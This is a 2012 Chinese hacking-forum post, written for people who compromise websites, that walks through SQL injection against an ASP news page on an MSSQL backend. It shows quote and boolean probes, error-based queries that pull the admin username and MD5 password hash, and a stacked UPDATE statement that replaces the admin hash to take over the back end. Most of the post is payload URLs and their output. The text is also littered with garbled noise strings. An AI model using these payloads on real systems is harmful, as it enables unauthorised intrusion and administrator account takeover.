经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
$ S, {, D, v" Z) ~可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
) y% X, `# J, m$ k. m0 Y测试如下:9 v* W% l! g5 v4 P: o
http://www.tmdsb.com/news.asp?id=121, j4 f2 R% Y$ Y* U W7 m4 |; O
在地址后输入单引号,显示
W6 d4 e" R: l9 L2 |, u* r' hMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
2 V( @5 a1 ^9 ]! y字符串 ’’’ 之前有未闭合的引号
1 ?4 y$ X s" W* j# L& k+ D/news/tmdws.asp,行63
0 S8 w' O& X7 k说明没有过滤单引号且数据库是MSSQL.
/ @& o# V; P6 N8 l% F, @/ fand 1=1正常。and 1=2出错。肯定存在注入
% B1 k/ b5 i2 q5 Z; m1 f' G Y接着输入$ K- ?: P9 z8 n0 f5 c% T' N; h8 E( |
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
( O: c* a$ ]6 p* K) T6 w得到帐号为:admin$ }, H! g$ e) P4 }- n# w$ [3 V
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
, K+ X( i5 i1 Q' Y: D" k得到密码为:a4716077c2ba075c# y2 {, p2 \% n7 m& }! Q3 v
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& o6 u8 U4 U; t$ {3 C" W# C9 v命令如下 :
_! C; @, d3 M;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–/ V! v$ p5 }- `8 ~9 Q' _+ y' u
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41